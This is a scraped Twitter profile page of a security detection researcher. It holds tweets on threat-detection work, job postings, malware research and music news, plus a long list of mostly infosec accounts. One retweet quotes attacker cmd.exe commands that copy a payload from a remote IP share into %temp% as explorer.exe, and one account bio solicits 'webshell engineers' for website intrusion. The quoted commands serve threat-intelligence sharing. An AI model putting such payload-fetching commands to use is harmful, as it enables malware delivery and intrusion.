William Metcalf @node5
I have been recruited by the Star League to defend the Frontier against Xur and the Ko-dan Armada Joined July 2009-
Tweets2K
-
Followers1K
-
Following392
-
Likes2K
Talk about ending the week on a high note. 🎉 With @Cisco's acquisition of @snapattackHQ now complete, we're looking forward to driving further Splunk innovation as we continue to deliver security solutions that support today's new era of SIEM. Read more here. #SplunkSecurity
Enjoy punching phish? Experience writing detections for phish, using regex, Yara, etc., and looking to grow as a researcher within an experienced team? Join me and the rest of the Splunk Attack Analyzer Misfits of Detection Science. US only, fully remote splunk.com/en_us/careers/…
For the 2 people who probably care I took a stab at adding cert validation, SAN extraction, and missing/invalid certs. github.com/wmetcalf/rdp_h…
I'll just leave this here... github.com/wmetcalf/rdp_h…
“America. Oasis is coming. You have one last chance to prove that you loved us all along.” Oasis will tour North America in 2025! Register for the North American ticket pre-sale private ballot 👉OasisMusic.lnk.to/L25NAmPS The pre-sale will take place Thursday, 3rd October. Tickets…
“This is it, this is happening” Tickets on sale this Saturday 31st August (🇮🇪8AM IST / 🇬🇧9AM BST) Dates: Cardiff Principality Stadium - 4th/5th July Manchester Heaton Park - 11th/12th/19th/20th July London Wembley Stadium - 25th/26th July & 2nd/3rd August Edinburgh Scottish Gas…
Liam and Noel Gallagher seemingly confirmed that an Oasis reunion is happening after sharing a cryptic clip on social media on Sunday. variety.com/2024/music/new…
I've hosted several malware analysis workshops over the past few years, I've collected those on YouTube and added to the following playlist 👇 youtube.com/playlist?list=… Samples from the workshops have been archived on Github: 👉 github.com/jstrosch/malwa…
Moar soon! Big updates coming
Happy to share this #STRT blog focusing on how attacker weaponized .LNK files in several phishing campaigns. In this blog we analyzed several malicious LNK to extract TTP’s for #detections and #simulation dev. enjoy reading! #int3 #splunk #cisco splunk.com/en_us/blog/sec…
I'll just leave this here... github.com/wmetcalf/msc_d…
Extremely proud of splunk.com/en_us/blog/sec… the latest blog on #WINELOADER by @tccontre18 @M_haggis and the #STRT team. My favorite things are: ⛓️ Super simple to understand the attack chain 🚗 [cue meme] this puppy fits soo many #atomicredteam tests 🛡️ Splunk detections! 1/x
On 14 Mar 2024 around 2115 UTC, #Gootloader changed the #JavaScript library it hides in to @ApacheECharts. The zip changed from around 720 KB to 5 MB. The .JS inside is now 22.5 MB. Created a new #YARA rule to detect it github.com/GootloaderSite…
🎉 Updated ASRGEN🚨 If you haven't been following along, Microsoft recently added two new ASR rules in preview. - Block rebooting machine in Safe Mode (preview) - Block use of copied or impersonated system tools (preview) 1. learn.microsoft.com/en-us/microsof… 2. learn.microsoft.com/en-us/microsof……
new role opened for someone who loves crafting detections, threat intel, and all the goodness of smashing bad in email: jobs.careers.microsoft.com/global/en/job/… happy to answer any questions
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: jobs.careers.microsoft.com/global/en/job/… I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: jobs.careers.microsoft.com/global/en/job/… I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious… https://t.co/mOV515XYNV
Example commands to copy files included: cmd.exe /c "extrac32 /Y /C \\64.52.80[.]221@80\udXyzMes\jquery %temp%\explorer.exe cmd.exe /c "findstr /V /L egwwge \\64.52.80[.]221@80\QUnsVajK\jquery > %temp%\explorer.exe cmd.exe /c "type \\64.52.80[.]221@80\FkFiTPvB\jquery >…

💻 Sherrod DeGrippo... @sherrod_im
36K Followers 7K Following Weird security voyeur. Vibe merchant. CISO of your 🩷 Official USPS fan account. 🎉 Host of THE Microsoft Threat Intelligence Podcast. I like crime actors.
SwiftOnSecurity @SwiftOnSecurity
405K Followers 9K Following computer security person. former helpdesk.
Dave Kennedy @HackingDave
223K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Pod. God + Family/Hacker/CSO/USMC/Intel/Fitness. Make the world a better place.
Will @BushidoToken
36K Followers 3K Following Senior Threat Intel Advisor @TeamCymru | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | Co-founder @BSidesBournemth | @darknetdiaries #126: REvil
Samir @SBousseaden
25K Followers 1K Following Detection Engineering | Elastic Security Mastodon: @[email protected]
James @James_inthe_box
22K Followers 464 Following
Paul Melson @pmelson
14K Followers 1K Following Author/Operator of @ScumBots. Blue Team by day, Blue Team by night. Opinions, typos, and bad grammar do not represent my employer. He/Him
Joe Roosen @JRoosen
8K Followers 1K Following SpyCloud - Director of Security Research, Cryptolaemus Coordinator, Emotet(Ivan)/QBot(Boris) Destroyer, gold prospector & former sysadmin.
Kimberly @StopMalvertisin
16K Followers 624 Following Security Researcher | Cyber Threat / Malware Analyst | Ex Sr. Threat Analyst @ Proofpoint | Founder of Stop Malvertising
Suricata IDS/IPS @Suricata_IDS
13K Followers 43 Following Suricata IDS/IPS/NSM engine developed by the @OISFoundation
Greg Linares (Laughin... @Laughing_Mantis
37K Followers 2K Following 20+ yrs in Infosec. Malware Influencer. I turn Malware into Art and Music. Art @MalwareArt. 4x Pwnie Nominee. 𝕍𝕏. GameDev. Autistic.
Ryan C. Moon @moonbas3
850 Followers 718 Following Rizz Incarnate |People dislike getting more of the same..they like new stuff even less. | PGP: 0xC3DE0C0116E3363A | @CheckMyDump & Co-Founder of RHMP
R. @0xrb
6K Followers 1K Following Reverse Threat Intel | Malware /Threat Hunter | Exploit Research \\ #IoT #Malware #Research, Reverse Engineering, #Botnet C2 #Hijacking
Stamus Networks @StamusN
1K Followers 239 Following Enterprise Clear NDR solutions. Leader in Suricata-based network security. Creator of open-source toools GopherCAP, Suricata Language Server, Splunk app.
Norbert @NB1r0
58 Followers 3K Following
Lisa Hammack @LHammack98540
6 Followers 171 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/ckjaCoiO8I
James @ozuriexv
16 Followers 74 Following Malware Analyst & Detection Engineer for the Emerging Threats team @proofpoint Exploit SME, RE rogue, Python pretender, sometimes look at PCAPs.
Eni🖤 @EnidaCasanova
173 Followers 60 Following 👾 Security Research @Microsoft - Writer 📝 - Opinions are my own.
kimbo4 @Be4orn
111 Followers 4K Following
Diaby Niffa @NeliNelisous
1 Followers 591 Following
Jose Enrique Hernande... @_josehelps
3K Followers 2K Following 🛡️ Threat Research Director @Splunk ❤️ Scuba Diving 🔧 Maintainer of #AtomicRedTeam #LOLDRIVERS #LOLRMM #LOLBAS
z3r0Fl0w @Fl0w3rr0r
35 Followers 1K Following
Anton @Antonlovesdnb
5K Followers 3K Following Blue Team stuff | Trying to be a decent human being | @munkschool Grad | Hunt & Response @HuntressLabs
operations6 @_operations6_
1K Followers 1K Following
Cyrus @cyrusSecurity
761 Followers 1K Following Security Researcher @crowdstrike | ex @microsoft @mitrecorp | Beardown @UArizona
Steve Borosh @rvrsh3ll
1K Followers 613 Following The future is not set. There is no fate, but what we make for ourselves. - John Connor
Br3akp0int @tccontre18
2K Followers 953 Following tweets are my own😉 Threat Researcher - interested in: (R.E, Red/Blue/Purple Team, DFIR, ML, Kernel, Exploit Dev) - https://t.co/qJyB5lIuHj
despiMe @UI7JRcDpA0XVzb5
2 Followers 468 Following
potatoherder @hackingforbeer
148 Followers 1K Following yeah nah, janitor. copy pasting through your network. floppy saves
DeadParr0t @d34d_parr0t
421 Followers 3K Following InfoSec eternal newb | 🇬🇧 | 🇫🇷 | Chaotic Good | Hacking & pentest stuff | Shitposts | Opinions here are those of my cat, mostly. @deadparr0t.bsky.social
Daniel Besmer @besmerd_
5 Followers 140 Following
[email protected]... @rpargman
4K Followers 5K Following Слава Україні! Most important job: being Dad; I also love to help people deny attackers the opportunity to break and steal all the things. Pronouns: He/him
redacted @00biwan
62 Followers 541 Following Retweets may indicate shock, astonishment, bemusement, bewilderment, horror, etc. CS faculty studying autonomous computing security
mizuho @mizuho_s
65 Followers 167 Following
Joseliyo @Joseliyo_Jstnk
2K Followers 597 Following CTI, Hunting & Detection | Security Engineer at @Google - @VirusTotal | Ex @McAfee @BlackBerry | opinions are my own.
Rorchach_Sec @RorchachSeC
19 Followers 436 Following
essam @essamelaal
94 Followers 3K Following If you enjoy working outdoors and solving problems with your hands and a basic understanding of machines and science, then a job as a driller that’s what I do
0v3r174 @0v3r174
29 Followers 603 Following
Plasma @b1tw1z4rd
0 Followers 5K Following
Guillermo @Guillermo
750 Followers 2K Following
sydney @letswastetime
538 Followers 361 Following `thrunter` | opinions != employers | she/her | search "thrunting soundtrack" | eval link="https://t.co/7EA1367cqG"
The AI Security Brief @AISecurityBrief
580 Followers 2K Following
Bhavin Patel @hackpsy
372 Followers 861 Following Threat Research Team @splunk Maintainer of #atomic-red-team
Daniel Stinson @shellcromancer
1K Followers 3K Following Building a new product! Used to do security engineering @ Brex, and Cloudflare. Hobbyist reverse engineer. Dogs are better than people.
Multani Saint @MultaniSaint
2K Followers 2K Following Software engineer + wannabe writer. The only non-activist on twitter. Shia Muslim cum Semi Deist! Personnel acc 4 political views. Typos expected!
Sticker the Planet @Stickerum
2K Followers 2K Following Handwritten notes + excellent stickers + other merch. {stop using sticker ass} #EPluribusStickerum Thank a postal worker! 🌈 Design by @1dark0ne 💞
Arshad Mehmood 🇺�... @ArshadMehmood46
274 Followers 4K Following Open for Data Loss Prevention (DLP) Analyst/Engineer roles in the Cybersecurity area🔰
Vicky Laurens @LaurensVicky
0 Followers 259 Following
abhie @abhie
1K Followers 265 Following Security Analyst - Microsoft Threat Intelligence Center (MSTIC) - My tweets are my own
𝚝𝚑𝚎𝚜𝚎�... @T_0_r_nado
65 Followers 5K Following
Maximilian Musterinov... @thethikibar
30 Followers 890 Following
Eoin Miller @Eoin_Miller
8 Followers 131 Following
michaelpdu @dupei_md
22 Followers 250 Following
Ellie Soto @casuallyobsess
214 Followers 781 Following Mom, amateur baker, #cybersecurity, #threathunting, #intel. I love unsolvable problems, great eyebrows, and my opinions are solely mine.
Florian Roth ⚡️ @cyb3rops
206K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
💻 Sherrod DeGrippo... @sherrod_im
36K Followers 7K Following Weird security voyeur. Vibe merchant. CISO of your 🩷 Official USPS fan account. 🎉 Host of THE Microsoft Threat Intelligence Podcast. I like crime actors.
SwiftOnSecurity @SwiftOnSecurity
405K Followers 9K Following computer security person. former helpdesk.
Dave Kennedy @HackingDave
223K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Pod. God + Family/Hacker/CSO/USMC/Intel/Fitness. Make the world a better place.
MalwareHunterTeam @malwrhunterteam
244K Followers 38 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.
Max_Malyutin @Max_Mal_
13K Followers 310 Following Threat Researcher, Blue Team, DFIR, Malware Analysis, and Reverse Engineering. “⚔️What do we say to God of malware, Not today⚔️”
Will @BushidoToken
36K Followers 3K Following Senior Threat Intel Advisor @TeamCymru | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | Co-founder @BSidesBournemth | @darknetdiaries #126: REvil
ςεяβεяμs - м�... @c3rb3ru5d3d53c
25K Followers 243 Following 💕 Malware Hunter Killer 💕 #binlex & #mwcfg Developer 📽️ YouTuber 👩💻 She/Her 💍@DravenSwiftbow Support my work 👇 ☕️ https://t.co/NoM1TXq00P
JAMESWT @JAMESWT_WT
37K Followers 507 Following #Independent #Malware #Hunter #CyberSecurity #InfoSec https://t.co/KCFBJcHHcW https://t.co/WODUKncjFy
Samir @SBousseaden
25K Followers 1K Following Detection Engineering | Elastic Security Mastodon: @[email protected]
James @James_inthe_box
22K Followers 464 Following
BleepingComputer @BleepinComputer
240K Followers 200 Following Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!
Jiří Vinopal @vinopaljiri
10K Followers 462 Following Threat Researcher at Check Point @_CPResearch_ #DFIR #Reversing - All opinions expressed here are mine only. https://t.co/iWvwWF1AnN
ExecuteMalware @executemalware
27K Followers 185 Following #malware hunter & analyst. Opinions are my own.
Tommy M (TheAnalyst) @ffforward
14K Followers 195 Following Threat Researcher @proofpoint | @Cryptolaemus1
Jazi @h2jazi
8K Followers 530 Following Threat Intel researcher! Technical tweets only; not reflective of employer's views. No endorsement of political groups/entities.
Joe Roosen @JRoosen
8K Followers 1K Following SpyCloud - Director of Security Research, Cryptolaemus Coordinator, Emotet(Ivan)/QBot(Boris) Destroyer, gold prospector & former sysadmin.
FatzQatz @FatzQatz
117 Followers 49 Following As a hobbyist in malware analysis, I enjoy uncovering cyber threats for fun.
Is Now on VT! @Now_on_VT
4K Followers 788 Following Stay ahead of cyber threats. Get real-time alerts on notable APT/FIN/ORB indicators from VirusTotal. A threat intel project by @craiu.
Gootloader @Gootloader
1K Followers 333 Following Security researcher dedicated to pissing off the Gootloader Threat Actor. Tox Chat: 5E7FB4CA0D59F48504AEC72907D64D71D22A00C023E584276F91DB26C924ED64C6D7F19348D2
potatoherder @hackingforbeer
148 Followers 1K Following yeah nah, janitor. copy pasting through your network. floppy saves
[email protected]... @rpargman
4K Followers 5K Following Слава Україні! Most important job: being Dad; I also love to help people deny attackers the opportunity to break and steal all the things. Pronouns: He/him
NaN_FMC @fmc_nan
755 Followers 253 Following Advanced Persistent Threat Hunter Tweets are personal views
Konstantin Klinger @kk_onstantin
699 Followers 744 Following Detection Engineering | he/him | 🌱⚽️🏃♂️🚴♂️🏊♂️ | tweets are my own
Joseliyo @Joseliyo_Jstnk
2K Followers 597 Following CTI, Hunting & Detection | Security Engineer at @Google - @VirusTotal | Ex @McAfee @BlackBerry | opinions are my own.
Thomas Patzke @blubbfiction
5K Followers 445 Following Incident Response, Threat Hunting. Opensource security tool developer (https://t.co/2twMtVpZtL). Moved to @[email protected]
The Haag™ @M_haggis
9K Followers 2K Following Threat Researcher | Co-Host of Atomics on a Friday | LOLDrivers & Atomic Red Team Maintainer | I'm Everywhere and Nowhere - BSG.
sydney @letswastetime
538 Followers 361 Following `thrunter` | opinions != employers | she/her | search "thrunting soundtrack" | eval link="https://t.co/7EA1367cqG"
Jose Enrique Hernande... @_josehelps
3K Followers 2K Following 🛡️ Threat Research Director @Splunk ❤️ Scuba Diving 🔧 Maintainer of #AtomicRedTeam #LOLDRIVERS #LOLRMM #LOLBAS
ZACKATT&CK @ZackDoesML
101 Followers 72 Following applying machine learning to infosec. opinions may not be my own but they are definitely not my employer's. he/him.
Fate112 @tosscoinwitcher
1K Followers 127 Following Witcher of InfoSec. InfoSec=paid to be terrified for people. /With all of my anger I scream and shout America, I love you but you're freaking me out/
Dad Jokes @Dadsaysjokes
643K Followers 52 Following Best dad jokes on twitter - we’re also on Instagram and Facebook.
abhie @abhie
1K Followers 265 Following Security Analyst - Microsoft Threat Intelligence Center (MSTIC) - My tweets are my own
Br3akp0int @tccontre18
2K Followers 953 Following tweets are my own😉 Threat Researcher - interested in: (R.E, Red/Blue/Purple Team, DFIR, ML, Kernel, Exploit Dev) - https://t.co/qJyB5lIuHj
David Ledbetter @Ledtech3
4K Followers 291 Following System Repair, Windows system tools ,Security research. IDA Challenged.
crep1x @crep1x
3K Followers 313 Following Lead cybercrime analyst, tracking adversaries activities & infrastructure, at @sekoia_io
Splunk @splunk
78K Followers 3K Following Splunk is building a safer and more resilient digital world by offering the unified security and observability platform.
Ankit Anubhav @ankit_anubhav
8K Followers 397 Following Voice of IoT Security & awareness. I make the world of IoT a safer place. Ex- McAfee / FireEye / NewSky
Dmitry Melikov @DmitriyMelikov
2K Followers 322 Following Threat Researcher @AWNetworks #cti #apt Former Threat Researcher @BlackBerry, @InQuest
Nasreddine Benchercha... @nas_bench
11K Followers 1K Following Detection @Splunk & @cisco | previously @nextronsystems | @sigma_hq & @magicswordio maintainer | Eternal Learner
souiten_4t_FuYingL4b @souiten
1K Followers 233 Following Biped analyser. APT | Botnet | MalDoc | CTF @NSFOCUS_Intl @fuyinglab
Stephan Berger @malmoeb
28K Followers 1K Following Head of Investigations @InfoGuardAG https://t.co/A5lnFAu7eX
Will Dormann is on Ma... @wdormann
26K Followers 1K Following I play with vulnerabilities and exploits. I used to be here on Twitter but now I'm here: @[email protected] https://t.co/hXggdAVkSQ
Michael Schneider @0x6d69636b
1K Followers 413 Following infosec, working at @scipag, #RedTeam, classic car rally driver for @teampaddymurphy, 🐘@[email protected]
sysopfb @sysopfb
4K Followers 762 Following Threat Intel as a reverse-engineer in Crimeware domain. Dubbed "Malware Mangler" by TheRegister. [email protected]
TwinWave Security @twinwavesec
53 Followers 24 Following TwinWave, a threat analysis platform helping security teams do their jobs more effectively and efficiently, was acquired by @Splunk in 2022.
Ross 🏳️🌈 @rwoll_dev
63 Followers 144 Following software engineer (he/him) @Microsoft @playwrightweb
stoerchl @stoerchl
2K Followers 102 Following Malware Analyst @HPSecurity | cycling enthusiast and blue jays fan!